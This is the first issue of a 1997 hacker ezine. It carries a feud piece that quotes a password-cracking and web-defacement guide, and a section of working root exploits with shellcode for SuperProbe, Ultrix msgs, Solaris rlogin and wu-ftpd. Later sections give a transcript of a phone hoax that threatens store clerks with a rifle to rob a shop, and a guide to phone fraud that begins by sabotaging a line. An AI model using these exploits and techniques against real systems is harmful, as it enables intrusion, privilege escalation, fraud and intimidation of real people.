───────────────────────────────────────────────────────────────────────────────
===============================================================================
=--------------------=====================================--------------------=
=--------------------= Status : Confidence Remains High. =--------------------=
=--------------------= Issue  : 001.                     =--------------------=
=--------------------= Date   : April 16th 1997.         =--------------------=
=--------------------=====================================--------------------=
===============================================================================
==================> http://el8.netgates.co.uk coming s00n <==================
===============================================================================
───────────────────────────────────────────────────────────────────────────────
                          .:. Site Of The Month .:.
───────────────────────────────────────────────────────────────────────────────
-----------------------> http://micros0ft.paranoia.com <-----------------------
───────────────────────────────────────────────────────────────────────────────
                               In This Issue :
───────────────────────────────────────────────────────────────────────────────

-----=> Section A : Introduction And Cover Story.

1. Welcome To Issue 1 Of Confidence Remains High......: Tetsu Khan
2. sIn eXposed........................................: The CodeZero + Friends

-----=> Section B : Exploits And Code.

1. SuperProbe.........................................: Solar Designer
2. Ultrix Exploit.....................................: StatioN
3. Solaris 2.5 / 2.5.1 rlogin Exploit.................: Jeremy Elson
4. wu-ftpd 2.4(1) Exploit.............................: Eugene Schultz
5. portmsg.c..........................................: Some FTP Someplace..

-----=> Section C : Phones / Scanning / Radio.

1. Fast Food Restaurant Frequencies...................: Dj Gizmo
2. Robbing Stores With Phones, A Real Example.........: The CrackHouse
3. How To Rewire Your House For Free Phone Calls......: WildFire

-----=> Section D : Miscellaneous.

1. Hacking Electrical Items Part 2, The Sequel........: Tetsu Khan
2. Virus Definitions..................................: so1o
3. Fun With whois, sinnerz.com........................: so1o
4. Hacking Space Shuttles, Abort Codes................: NailGun
5. Country Domain Listing.............................: SirLance

-----=> Section E : World News.

1. CoreWars...........................................: so1o / odÝphreak
2. Technophoria Want A Piece Of CodeZero Too?.........: so1o
3. Global kOS Press Release...........................: Spidey
4. www.ncaa.com Hack Makes News.......................: so1o
5. CodeZero To Release sunOS 5.x RootKit..............: so1o
6. Too Many nethosting.com Break-Ins..................: so1o
7. sulfur of #hack to print a bi-monthly magazine.....: so1o

------=> Section F : Projects.

1. IP Spoofing Programs And Utilities.................: Dr_Sp00f
2. Using LinuxRootKitIII..............................: suid

-----=> Section G : The End.

───────────────────────────────────────────────────────────────────────────────
===============================================================================
==[ INTRO ]====================[ .SECTION A. ]======================[ INTRO ]==
===============================================================================
───────────────────────────────────────────────────────────────────────────────
1. Welcome To Issue 1 Of Confidence Remains High : Tetsu Khan
───────────────────────────────────────────────────────────────────────────────

Confidence Remains High will be issued EVERY 50 DAYS as from April 16th...
It is free, not like 2600, or sulfur's (he's 15 years old, and he loves
emmanuel btw.) Access Denied, which both cost *YOU*, the reader, MONEY, cash,
$$$ etc., which we don't like, because information should be free. And so we
bring you Confidence Remains High, with news, exploits, scanning, telco, and
enough shit to make you wonder "why did I ever pay cash for this?!" Anyway, on
with the show...

        .:. Confidence Remains High will s00n be available at .:.
   -----------------=>> http://confidence.netgates.co.uk <<=------------------

Until then...check out...

http://www.mastaz.org/codezero/
http://ulticonn.dyndns.com/codezero/

Confidence Remains High is issued every 50 days as from April 16th, so issue 20
will be released on New Year's Day 2000 (if we go that far!)

Tetsu Khan.

───────────────────────────────────────────────────────────────────────────────
2. sIn eXposed : CodeZero + Friends.
───────────────────────────────────────────────────────────────────────────────

If you can't be bothered to read all this shit, just go to...

---------------> www.sinnerz.com/bible.htm <---------------

...And view the lameness for yourself :)

-------------------------------------------------------------------------------

Concerning the news in issue 2 of the CodeZero technical journal, we found this
response (http://www.sinnerz.com/codezero.txt) :

So has anyone here heard of Codezero? Its some ezine type shit that i just
wanted to expose as bullshit. I had never heard of it till i talked to darkfool
and he showed me... You can check it out at neonunix.org/codezero. It is pretty
good for a laugh. When me and Banshee and Messiah first read it we all were in
#sin and the first thing to come to our mind was.. wtf is this? Some hacker
gossip column or what? Even more funny was the surprise i got when i saw that
the editor was Tetsu Khan (so1o who was mentioned earlier in the Bible)... that
brought a smile to my face to see that. Anyways so i was reading thru issue 2
of codezero and i happend to see a lot of bogus information...stuff said that
wasn't true. Same with the first issue.
Examples our comments like "Infected has some new programs coming out soon
including Utopia an encryption program by The Messiah." Anyways im doing the
algorithm for that program with Messiah and it is not going to be out for a
long time... Messiah has a lot of plans for the future all coming before Utopia
does....

Those are the exact, untouched words of HosTiÝe of SiN. Hmmm, let's examine
that passage more closely...

"some ezine type shit that i just wanted to expose as bullshit..."

"i was reading thru issue 2 of codezero and i happend to see a lot of bogus
information...stuff said that wasn't true..."

This is very interesting indeed, that they should care about a small news
section in the journal, isn't it? Seeing that we published how many lines about
them? A whole 20, I hear you say? Hmm...doesn't the journal have exploits and
other stuff in it too? I think it does...

"Anyways im doing the algorithm for that program with Messiah and it is not
going to be out for a long time... Messiah has a lot of plans for the future
all coming before Utopia does...."

So then HoStiÝe, you can program now? That's new, and *YOU* are coding the
algorithm? Interesting... WAIT! You are saying that Utopia is real? And that we
did publish correct information? I always thought so, seeing that the truth is
that you probably wanted your beautiful new program to be a big surprise to the
"scene"... Heh, how silly of me to actually think you had a clue! You just
can't take it that you are stuck in a lame fuck group of wannabes and the truth
is finally coming out...Let us examine more examples found on www.sinnerz.com :

It also had some shit like "4 new hacks were reported this month" and they were
right on the 4 new hacks part but they put bogus shit about them. The catch22
one they happend to put the html for it.. well they put the wrong shit that
was on it. Becuz on the catch22 hack Darkfool had put the names of all the SIN
members on the page. Which they decided to leave out...
also They put some weird shit which they said was on the 2 hacks Darkfool did.
Where it was the entersin.gif from our page that was there with a bunch of
other links. Anyways there is also a lot of other shit that was bullshit in
both of their issues...

SHoCk HoRRoR !!!! Darkfool was responsible for the www.catch22.com hack?? And
SiN was linked to the hacks too?? That is interesting news HoSTiÝe, seeing you
just could have landed one of your SiN members in trouble, as CodeZero didn't
mention any names concerning the catch22.com hack, and the very first
index.html to go up, which was the one we published, was in fact correct; it's
just that the index.html must have changed how many times that day? Hmmm...

"...wrong shit that was on it. Becuz on the catch22 hack Darkfool had put the
names of all the SIN members on the page. Which they decided to leave out..."

Strange...seeing another hacker, by the name of Sventa, was blamed entirely for
the attacks. Oh yeah, one last thing, in the index.html that was apparently
modified by Darkfool of SiN, there were 8 numbers. We know what they stand for,
SiN doesn't; all will be explained one day, as SiN are cl00less and need a good
kicking.

Let us continue, with a "hacking guide" taken from www.sinnerz.com :

--------------------------------------------------------------------

[SiN ASCII-art logo: http://www.sinnerz.com]

OK, this is my mini guide to the easiest 'hacking' there is ( I think ) if any
one knows different then mail me and tell me :) .

Most FTP servers have the directory /pub which stores all the 'public'
information for you to download. But alongside /pub you will probably find
other directories such as /bin and /etc. It's the /etc directory which is
important.
In this directory there is normally a file called passwd. This looks something
like this :-

root:7GHgfHgfhG:1127:20:Superuser
jgibson:7fOsTXF2pA1W2:1128:20:Jim Gibson,,,,,,,:/usr/people/jgibson:/bin/csh
tvr:EUyd5XAAtv2dA:1129:20:Tovar:/usr/people/tvr:/bin/csh
mcn:t3e.QVzvUC1T.:1130:20:Greatbear,,,,,,,:/usr/people/mcn:/bin/csh
mouse:EUyd5XAAtv2dA:1131:20:Melissa P.:/usr/people/mouse:/bin/csh

This is where all the user names and passwords are kept. For example, root is
the superuser and the rest are normal users on the site. The bit after the word
root or mcn such as in this example (EUyd5XAAtv2dA) is the password BUT it is
encrypted. So you use a password cracker....which you can d/l from numerous
sites which I will give some URL's to at the end of this document. With these
password crackers you will be asked to supply a passwd file which you download
from the /etc directory of the FTP server and a dictionary file which the
cracker program will go through and try to see if it can make any match. And
as many people use simple passwords you can use a 'normal' dictionary file. But
when ppl REALLY don't want you to break their machines they set their passwords
to things such as GHTiCk45 which Random Word Generator will create
(eventually). Which is where programs such as Random Word Generator come in.
( Sorry just plugging my software )

BTW the bad news is that new sites NORMALLY have password files which look
like this :-

root:x:0:1:0000-Admin(0000):/:/sbin/sh

The x signifies shadowed - you can't use a cracker to crack it because there's
nothing there to crack, it's hidden somewhere else that you can't get to. x is
also represented as a * or sometimes a . Ones like the top example are known as
un-shadowed password files, normally found at places with .org domain or .net
and perhaps even .edu sites. (Also cough .nasa.gov cough sites).
If you want a normal dictionary file i recommend you go to
http://www.globalkos.org and download kOS Krack which has a 3 MEG dictionary
file. Then run a .passwd cracking program such as jack the ripper or hades or
killer crack ( I recommend ) against the .passwd file and dictionary file.
Depending upon the amount of passwords in the .passwd file, the size of the
dictionary file and the speed of the processor it could be a lengthy process.

Eventually once you have cracked a password you need a basic knowledge of
unix. I have included the necessary commands to upload a different index.html
file to a server :-

Connect to a server through ftp preferably going through a few shells to hide
your host and login using the hacked account at the Login: Password: part.
Then once connected type dir or list. If there's a directory called
public_html@ or something similar change directory using the simple DOS cd
command ( cd public_html ). Then type binary to set the mode to binary
transfer ( so you can send images if necessary ). Then type put index.html or
whatever the index file is called. It will then ask which transfer you wish to
use, Z-Modem is the best. Select the file at your end you wish to upload and
send it. That's it ! If you have root delete any log files too.

Please note that this process varies machine to machine.

To change the password file for the account ( very mean ) login in through
telnet and simply type passwd at the prompt and set the password for the
account to anything you wish.

That's it....if ya don't understand it read it about 10x if ya still don't ask
someone else i am too busy with errrr stuff..

Links :-

http://www.sinnerz.com      Where you got this I hope.

Stay cool and be somebody's fool everyone

Darkfool
darkfool@pancreas.com
http://www.sinnerz.com

---

Ummm, *NEWS FLASH*, let's see shall we, this tells attackers to retrieve the
passwd file using what?! FTP I hear you scream? Well, let's see shall we
children, gather 'round...
"Most FTP servers have the directory /pub which stores all the 'public' information for you to download. But along side /pub you will probably find other directorys such as /bin and /etc its the /etc directory which is important. In this directory there is normally a file called passwd. . This looks something like this :-" Oh dear, oh dear, oh dear, lets look at the FACTS : Common FTP passwd path : /home/ftp/etc/passwd *REAL* passwd path : /etc/passwd Hmm, lets see, anyone with a clue would know that the FTP passwd file is not real, it is only there to mislead little wannabes, examples iclude members of SiN. We continue... "Eventually once you have cracked a password you need a basic knowledge of unix. I have included the necassary commands to upload a different index.html file to a server :- Connect to a server through ftp prefably going through a few shells to hide your host and login using the hacked account at the Login: Password: part. Then once connected type dir or list If there's a directory called public_html@ or something similar change directory using the Simple dos cd command ( cd public_html ) Then type binary to set the mode to binary transfer ( so you can send images if necassary ) Then type put index.html or whatever the index file is called. It will then ask which transfer you wish to use, Z-Modem is the best. Select the file at your end you wish to upload and send it. Thats it !" Okay, so now, SiN defines hacking as downloading the /home/ftp/etc/passwd which is a decoy, and then proceed to get kOS Krack (last time I checked www.globalkos.org was down) and then try to crack the passwd file and finally use FTP to upload an index.html? how imaginative and original, pity all of this info you have been fed is absolute crap, with a success rate of practically zero. One last thing... "If you have root delete any log files too." 
Umm, but you haven't told all our wannabe hackers that read your shit where the
log files are found, seeing that you have to find them, delete them, then touch
them. Oh yeah, I thought you were using FTP? Strange...

I'm sure that from these examples we have forwarded to you we have started to
prove the truth behind SiN, seeing they are actually quite lame wannabes with
very minimal skills...this has been shown, and we will continue to add to this
hall of shame for SiN, as until now, no-one has stood up to them, but now it is
time for a change.

Watch this space my friends,

Until next time...

T_K

I wish I was in sIn, I dew I dew! I dew!! sIn is 3r33t!! -- so1o

───────────────────────────────────────────────────────────────────────────────
===============================================================================
==[ EXPLOITS ]=================[ .SECTION B. ]===================[ EXPLOITS ]==
===============================================================================
───────────────────────────────────────────────────────────────────────────────
1. SuperProbe : Solar Designer
───────────────────────────────────────────────────────────────────────────────

/*
 * SuperProbe buffer overflow exploit for Linux, tested on Slackware 3.1
 * by Solar Designer 1997.
 */

/* The header names were stripped when this issue was extracted; the
 * standard headers the code uses are restored here. */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

char *shellcode =
  "\x31\xc0\xb0\x31\xcd\x80\x93\x31\xc0\xb0\x17\xcd\x80\x68\x59\x58\xff\xe1"
  "\xff\xd4\x31\xc0\x8d\x51\x04\x89\xcf\x89\x02\xb0\x2e\x40\xfc\xae\x75\xfd"
  "\x89\x39\x89\xfb\x40\xae\x75\xfd\x88\x67\xff\xb0\x0b\xcd\x80\x31\xc0\x40"
  "\x31\xdb\xcd\x80/"
  "/bin/sh"
  "0";

char *get_sp() {
  asm("movl %esp,%eax");
}

#define bufsize 8192
#define alignment 0

char buffer[bufsize];

main() {
  int i;

  for (i = 0; i < bufsize / 2; i += 4)
    *(char **)&buffer[i] = get_sp() - 2048;
  memset(&buffer[bufsize / 2], 0x90, bufsize / 2);
  strcpy(&buffer[bufsize - 256], shellcode);
  setenv("SHELLCODE", buffer, 1);

  memset(buffer, 'x', 72);
  *(char **)&buffer[72] = get_sp() - 6144 - alignment;
  buffer[76] = 0;

  execl("/usr/X11/bin/SuperProbe", "SuperProbe", "-nopr", buffer, NULL);
}

───────────────────────────────────────────────────────────────────────────────
2. Ultrix Exploit : StatioN
───────────────────────────────────────────────────────────────────────────────

This bug has been fixed in OSF, but not in Ultrix. It should also work on any
system that has the msgs mail alias.

$ grep msgs /etc/aliases
msgs: "|/usr/ucb/msgs -s"

Ok, the first thing to do is look in the /usr/msgs directory (or whatever the
directory is where the msgs files are kept), and see what the next msgs file
will be (if there is 1 and 2, then the next one is pretty easy to figure out).
Then, make an executable /tmp/a that like makes a suid shell (this is pretty
easy to do, if you can't do it, don't consider yourself a hacker).

By default, newsyslog executes every 6 days at 4 am, but it depends on the
setup in crontab. What it does is age the syslog file (at /usr/adm/syslog.1,
.2, ..., i think).

symlink /usr/msgs/ -> /usr/adm/newsyslog

$ telnet
telnet> o localhost 25
(mail shit, version, etc)
expn msgs
250 <"| /usr/ucb/msgs -s">
mail from: <`/tmp/a`>
rcpt to: msgs
data
doesn't matter what you put here
.
quit

So now, when it writes to /usr/msgs/, it will overwrite /usr/adm/newsyslog,
and since /usr/adm/newsyslog is a shell script, it will expand `/tmp/a` by
executing /tmp/a AS ROOT, giving you an suid shell or whatever /tmp/a does.
From there, just clean up after yourself.

StatioN

───────────────────────────────────────────────────────────────────────────────
3. Solaris 2.5 / 2.5.1 rlogin Exploit : Jeremy Elson
───────────────────────────────────────────────────────────────────────────────

/*
 * rlogin-exploit.c: gets a root shell on most Solaris 2.5/2.5.1 machines
 * by exploiting the gethostbyname() overflow in rlogin.
 *
 * gcc -o rlogin-exploit rlogin-exploit.c
 *
 * Jeremy Elson,
 * jeremy.elson@nih.gov
 */

/* The header names were stripped when this issue was extracted; the
 * standard headers the code uses are restored here. */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>

#define BUF_LENGTH 8200
#define EXTRA 100
#define STACK_OFFSET 4000
#define SPARC_NOP 0xa61cc013

u_char sparc_shellcode[] =
  "\x82\x10\x20\xca\xa6\x1c\xc0\x13\x90\x0c\xc0\x13\x92\x0c\xc0\x13"
  "\xa6\x04\xe0\x01\x91\xd4\xff\xff\x2d\x0b\xd8\x9a\xac\x15\xa1\x6e"
  "\x2f\x0b\xdc\xda\x90\x0b\x80\x0e\x92\x03\xa0\x08\x94\x1a\x80\x0a"
  "\x9c\x03\xa0\x10\xec\x3b\xbf\xf0\xdc\x23\xbf\xf8\xc0\x23\xbf\xfc"
  "\x82\x10\x20\x3b\x91\xd4\xff\xff";

u_long get_sp(void)
{
  __asm__("mov %sp,%i0 \n");
}

void main(int argc, char *argv[])
{
  char buf[BUF_LENGTH + EXTRA];
  long targ_addr;
  u_long *long_p;
  u_char *char_p;
  int i, code_length = strlen(sparc_shellcode);

  /* fill the front of the buffer with NOPs */
  long_p = (u_long *) buf;
  for (i = 0; i < (BUF_LENGTH - code_length) / sizeof(u_long); i++)
    *long_p++ = SPARC_NOP;

  /* then the shellcode */
  char_p = (u_char *) long_p;
  for (i = 0; i < code_length; i++)
    *char_p++ = sparc_shellcode[i];

  /* then the guessed return address, repeated */
  long_p = (u_long *) char_p;
  targ_addr = get_sp() - STACK_OFFSET;
  for (i = 0; i < EXTRA / sizeof(u_long); i++)
    *long_p++ = targ_addr;

  printf("Jumping to address 0x%lx\n", targ_addr);

  execl("/usr/bin/rlogin", "rlogin", buf, (char *) 0);
  perror("execl failed");
}

───────────────────────────────────────────────────────────────────────────────
4. wu-ftpd 2.4(1) Exploit : Eugene Schultz
───────────────────────────────────────────────────────────────────────────────

This sploit is a teeny bit outdated, but I have been asked by many people about
exploiting FTP recently... This shows you how to use the wuftp2.4(1) hole to
gain root.

------------------------------------------------------------

On the VICTIM system, compile the following C code:
---------------------------------------------------

#include <stdlib.h>
#include <unistd.h>

int main(void)
{
    setuid(0);
    seteuid(0);
    system("cp /bin/sh /tmp/suidroot");
    system("chmod a+rwxs /tmp/suidroot");
    return 0;
}

Now create a shell script, called root.sh, that contains the following:
-----------------------------------------------------------------------

exec a.out       <----- a.out is the name of the compiled C code

Now, FTP localhost, login as your account on that system and:
-------------------------------------------------------------

ftp> quote site exec sh root.sh

Then quit FTP and execute /tmp/suidroot to become root!

───────────────────────────────────────────────────────────────────────────────
5. portmsg.c : Some FTP Someplace..
───────────────────────────────────────────────────────────────────────────────

/**************************************************************************/
/* portmsg - generate a message on a port, then close connection          */
/*                                                                        */
/* Usage: portmsg file port                                               */
/*                                                                        */
/* When a telnet client connects to the specified port, the               */
/* text from the file will be echoed to the user.  After a                */
/* short delay the connection will close.                                 */
/*                                                                        */
/* eg. portmsg /etc/passwd 666                                            */
/*                                                                        */
/**************************************************************************/

/* The eleven header names were stripped when this issue was extracted; the
 * set below is a reconstruction that covers every call the code makes. */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <fcntl.h>
#include <errno.h>
#include <signal.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <sys/socket.h>
#include <sys/wait.h>
#include <sys/resource.h>
#include <sys/ioctl.h>
#include <sys/param.h>
#include <netinet/in.h>

/* SIGCHLD handler: reap exited children so they do not linger as zombies. */
void wait_on_child(int sig)
{
    int status;

    (void)sig;
    while (wait3(&status, WNOHANG, (struct rusage *) 0) > 0)
        ;
}

/* SIGPIPE handler: the client went away, so just exit. */
void lostconn(int sig)
{
    (void)sig;
    exit(1);
}

int main(int argc, char *argv[])
{
    int msgfd, fd, n;
    struct stat statBuf;
    int port;
    char *msg;
    int sockfd, newsockfd;
    socklen_t addrlen;
    int opt;
    struct sockaddr_in tcp_srv_addr;
    struct sockaddr_in their_addr;

    if (argc != 3) {
        fprintf(stderr, "Usage: portmsg file port\n");
        exit(1);
    }

    port = atoi(argv[2]);
    if (port == 0) {
        fprintf(stderr, "error: bad port number [%s]\n", argv[2]);
        exit(1);
    }

    if ((msgfd = open(argv[1], O_RDONLY)) < 0) {
        fprintf(stderr, "error: cannot open message file [%s]\n", argv[1]);
        exit(1);
    }

    /* read the message */
    fstat(msgfd, &statBuf);
    if (statBuf.st_size <= 0) {
        fprintf(stderr, "error: message file [%s] is empty\n", argv[1]);
        exit(1);
    }
    msg = (char *)malloc(statBuf.st_size);
    if (msg == NULL) {
        fprintf(stderr, "error: out of memory\n");
        exit(1);
    }
    if (read(msgfd, msg, statBuf.st_size) != statBuf.st_size) {
        fprintf(stderr, "error: cannot read message file [%s]\n", argv[1]);
        exit(1);
    }
    close(msgfd);

    /* become a daemon */
    switch (fork()) {
    case -1:
        fprintf(stderr, "error: can't fork\n");
        exit(1);
    case 0:
        break;
    default:
        exit(0);
    }

    /* the original called the BSD setpgrp(0, getpid()); setsid() is the
     * portable way to start a new session and detach from the tty */
    if (setsid() == -1) {
        fprintf(stderr, "error: can't change process group\n");
        exit(1);
    }
    if ((fd = open("/dev/tty", O_RDWR)) >= 0) {
        ioctl(fd, TIOCNOTTY, NULL);
        close(fd);
    }

    (void)signal(SIGCHLD, wait_on_child);

    memset(&tcp_srv_addr, 0, sizeof(tcp_srv_addr));
    tcp_srv_addr.sin_family = AF_INET;
    tcp_srv_addr.sin_addr.s_addr = htonl(INADDR_ANY);
    tcp_srv_addr.sin_port = htons(port);

    if ((sockfd = socket(AF_INET, SOCK_STREAM, 0)) < 0) {
        fprintf(stderr, "can't create stream socket\n");
        exit(-1);
    }

    opt = 1;
    if (setsockopt(sockfd, SOL_SOCKET, SO_REUSEADDR, (char *) &opt,
                   sizeof(opt)) < 0) {
        perror("setsockopt");
        exit(1);
    }

    if (bind(sockfd, (struct sockaddr *)&tcp_srv_addr,
             sizeof(tcp_srv_addr)) < 0) {
        fprintf(stderr, "can't bind local address\n");
        exit(-1);
    }

    listen(sockfd, 5);

main_again:
    addrlen = sizeof(their_addr);
    newsockfd = accept(sockfd, (struct sockaddr *) &their_addr, &addrlen);
    if (newsockfd < 0) {
        if (errno == EINTR)
            goto main_again;
        fprintf(stderr, "accept error\n");
        exit(-1);
    }

    /* one child per connection; the parent goes back to accept() */
    switch (fork()) {
    case -1:
        fprintf(stderr, "server can't fork\n");
        exit(-1);
    case 0:
        dup2(newsockfd, 0);
        dup2(newsockfd, 1);
        for (n = 3; n < NOFILE; n++)
            close(n);
        break;
    default:
        close(newsockfd);
        goto main_again;
    }

    /* daemon child arrives here */
    (void)signal(SIGPIPE, lostconn);
    (void)signal(SIGCHLD, SIG_IGN);

    /* The original did fprintf(stdout, msg): the file contents were passed
     * as the printf format string (a format-string bug, since any % sequence
     * in the file is interpreted) and the buffer is not NUL-terminated.
     * Write the bytes out verbatim instead. */
    fwrite(msg, 1, statBuf.st_size, stdout);
    (void)fflush(stdout);
    sleep(5);
    exit(0);
}

───────────────────────────────────────────────────────────────────────────────
===============================================================================
==[ FONES / SCANNING ]=========[ .SECTION C. ]===========[ FONES / SCANNING ]==
===============================================================================
───────────────────────────────────────────────────────────────────────────────
1. Fast Food Restaurant Frequencies : Dj Gizmo
───────────────────────────────────────────────────────────────────────────────

If you got a scanner and/or transceiver that works with these frequencies,
then you could have some serious phun...
-------------------------------------------------------------------------------
RESTAURANT                     CUSTOMER (R)    CLERK (I)       LOCATION
-------------------------------------------------------------------------------
Arby's                         30.8400         154.5700        Nationwide
Bess Eaton Donut               457.5375        467.7625        Rhode Island
Big Boy                        30.8400         154.5700        UNKNOWN OH area
                               457.6000        467.8250        UNKNOWN OH area
Burger King                    30.8400         154.5700        UNKNOWN OH area
                               31.0000         170.3050        UNKNOWN GA area
                               33.4000         154.5400        Frederick, MD
                               457.5500        467.7750        Baltimore, MD area
                               457.5625        467.7875        Nationwide
                               457.5750        467.8000        UNKNOWN area
                               457.6000        467.8250        UNKNOWN area
                               460.8875        465.8875        Nationwide
                               461.5375        UNKNOWN         UNKNOWN OH area
Burgerville                    30.8400         154.5700        UNKNOWN OH area
Dairy Queen                    30.8400         154.5700        UNKNOWN OH area
                               460.8875        465.8875        UNKNOWN OH area
                               920.2625 WFM    UNKNOWN         Halifax, Nova Scotia
Dunkin Donuts                  30.8400         154.5700        UNKNOWN NH area
                               33.1600         154.5150        UNKNOWN NH area
                               33.4000         154.5400        UNKNOWN NH area
El Mexicano                    464.9625        469.9625        Germantown, MD
G.D. Ritzy's                   35.1000         UNKNOWN         UNKNOWN OH area
Hardee's                       30.8400         154.5700        Nationwide
                               31.0000         170.3050        UNKNOWN NC area
                               457.5375        467.7625        UNKNOWN OH area
                               460.8875        465.8875        UNKNOWN OH area
                               461.0875        466.0875        UNKNOWN OH area
                               461.1125        466.1125        Aurora, IL area
Jack in the Box                33.4000         154.5400        San Jose, CA
Kenny Rogers Roasters Chicken  469.0125        464.0125        Frederick, MD
Kentucky Fried Chicken         30.8400         154.5700        Occoquan, VA area
                               31.0000         170.3050        UNKNOWN MN area
                               33.1400         151.8950        UNKNOWN OH area
                               35.0200         154.6000        Frederick, MD
                               457.5875        467.8125        Vienna, VA area
                               457.6000        467.8250        UNKNOWN OH area
                               460.8875        465.8875        Washington, DC area
                               462.7625        467.8875        Washington, DC area
McDonald's CANADA              30.8400         151.6700        main freq. Canada
                               30.8400         154.1450        aux. freq. Canada
McDonald's U.S.A.              30.8400         154.5700        San Diego, CA area
                               31.0000         170.3050        UNKNOWN OH/NC area
                               33.1400         151.8950        Nationwide
                               33.1400         170.3050        Southfield, MI area
                               33.4000         154.5400        Frederick, MD
                               33.4000         154.5700        UNKNOWN area **
                               35.0200         151.8950        UNKNOWN area **
                               35.0200         154.4900        Decatur, IN area
                               35.0200         154.6000        Nationwide
                               151.7150        169.4450        Washington, DC area
                               151.7450        UNKNOWN         UNKNOWN OH area
                               151.7750        171.9050        UNKNOWN OH area
                               154.5700        170.2450        Nationwide
                               154.6000        171.1050        Nationwide
                               155.0000        UNKNOWN         UNKNOWN OH area
                               457.5375        461.0875        UNKNOWN OH area
                               457.5500        467.7750        UNKNOWN OH area
                               457.6000        467.8250        UNKNOWN OH area
                               460.8875        465.8875        UNKNOWN OH area
                               461.0375        466.0375        UNKNOWN OK/CA area
                               461.0875        466.0875        UNKNOWN OH area
                               462.1625        467.1625        UNKNOWN OH area
                               463.2875        468.2875        UNKNOWN NY area
                               464.5125        UNKNOWN         UNKNOWN OH area
                               469.0125        464.0125        Germantown, MD
                               469.1875        464.1875        Frederick, MD
                               920.5000 WFM    903.5000 WFM    Gaithersburg, MD
Rally's                        457.5375        468.3875        UNKNOWN OH area
                               461.0875        466.0875        UNKNOWN OH area
                               461.5375        462.1625        Holland OH area
Roy Rogers                     30.8400         154.5700        Germantown, MD
                               457.5375        467.7625        Washington, DC area
                               469.0125        464.0125        Germantown, MD
                               469.9250        464.9250        Vienna, VA
Taco Bell                      30.8400         154.5700        Washington, DC area
                               33.1600         154.5150        Frederick, MD
                               33.4000         154.5400        Germantown, MD
                               460.8875        465.8875        Nationwide
                               461.0875        466.0875        UNKNOWN OH area
                               461.5375        UNKNOWN         UNKNOWN OH area
                               464.9625        469.9625        UNKNOWN OH area
                               469.0125        464.0125        Reston, VA
Wendy's                        33.4000         154.5400        Rockville, MD
                               49.8300         49.8900         UNKNOWN area **
                               457.5125        467.7375        UNKNOWN OH area
                               457.5375        467.7625        UNKNOWN OH area
                               457.6125        467.8375        Washington, DC area
                               460.8875        465.8875        Nationwide
                               461.0875        466.0875        UNKNOWN OH area
                               461.8125        UNKNOWN         UNKNOWN OH area
                               464.3750        UNKNOWN         Headquarters
                               464.5125        UNKNOWN         Columbus, OH area
White Castle                   457.6000        467.8250        UNKNOWN OH area
                               461.8125        UNKNOWN         Columbus, OH area
-------------------------------------------------------------------------------

- Have Phun!

───────────────────────────────────────────────────────────────────────────────
2. Robbing Stores With Phones, A Real Example : The CrackHouse
───────────────────────────────────────────────────────────────────────────────

the following is a transcript of a teleconference robbery of a Wawa convenience
store, all names remain the same to fully implicate the guilty. The sad thing
is this is an actual transcript.

dk: Hello, listen very carefully I'm not going to repeat myself.
manager: Who is this?
dk: Don't worry about that, listen carefully, don't interrupt. Are you the
    manager and if so what is your name?
manager: yes, i'm the manager, my name's kathy.
dk: ok kathy, look across the street do you see the apartment complex directly
    opposite you?
manager: yes.
dk: i have a man stationed in a car in that complex's parking lot. he has a
    high powered assault rifle aimed at the individual behind the counter. i
    have another man stationed adjacent to the Wawa with a cellular phone.
    what's the individual's name behind the cash register?
manager: her name's Lori, please don't hurt anyone.
dk: no one's going to get hurt as long as you shut the fuck up and do exactly
    as i say. instruct lori that she is to keep her hands on the counter at all
    times, with her palms laid out flat. she's only to move when she must make
    change for a customer, do not alert any customers in the store kathy. do
    you understand me?
manager: yes i understand, hold on. (kathy then instructs lori) please promise
    you won't hurt anyone? please.
dk: no one's getting hurt, now we got 30 seconds kathy from when i say go, when
    i say go you grab a plastic bag, fill it with all the money in the register
    furthest from the doorway and open the back door and leave all the money
    there, then shut and lock the door.
manager: ok ok, do you want the foodstamps?
dk: no! the foodstamps go in a separate bag.
sulfur: and get me a gatorade.
manager: a gatorade? what kind?
sulfur: if it's not a large i'm gonna open fire.
manager: ok just please don't hurt anyone.
dk: ok kathy, go!
(there's a rustling of bags and some background noise)
manager: ok, done, now what?
dk: kathy have you made any attempt to contact any form of law enforcement?
manager: no i promise.
sulfur: she's lying.
dk: kathy, do you know what a digital voice analyzer is? (dk is now completely
    talking out his ass)
manager: no.
dk: well we have one connected to a polygraph examiner and it's telling us
    you're lying kathy.
manager: i swear to you i'm not lying!
sulfur: shoot her
dk: kathy you're lying.
manager: no no i'm not!
dk: you're lying kathy, mike, open fire open fire!
z: open fire!!
manager: LORI!! DUCK!!
*click*
everyone on the conference call: BAHAHAHAHAHAHAHAHAHA

───────────────────────────────────────────────────────────────────────────────
3. How To Rewire Your House For Free Phone Calls : WildFire
───────────────────────────────────────────────────────────────────────────────

(-)(-)(-)(-)(-)(-)(-)(-)(-)(-)(-)(-)(-)(-)(-)(-)(-)
How To Rewire Your House For Free Fone Calls In The U.K
(-)(-)(-)(-)(-)(-)(-)(-)(-)(-)(-)(-)(-)(-)(-)(-)(-)

By WildFire of AWOL

The aim is to teach you how to rewire your house to an engineer test line for
free Fone calls. You don't need any little coloured boxes etc, all you need is
a bit of patience and a lot of guts =)

EQUIPMENT -:

A B.T line into your house
Socket wrench with 1/2 inch bit
Official looking engineer clothing (lumi jacket)
C.B radios (Optional)

STEP 1:

We need to find out some information about your line (Note : these numbers are
nothing to do with your Fone number). What we need to know is how it runs back
to B.T. Eg. The pole outside your house is the first contact, then it runs
underground to a big green box; these are called DP's (Disconnection/Connection
points).

Fig 1.

    House -----> Pole ------> Green box ------> B.T
                  \/             \/
    Prefix =      46             95

The way to find this out is by sabotaging your house's fone line to get an
engineer to pay you a visit.
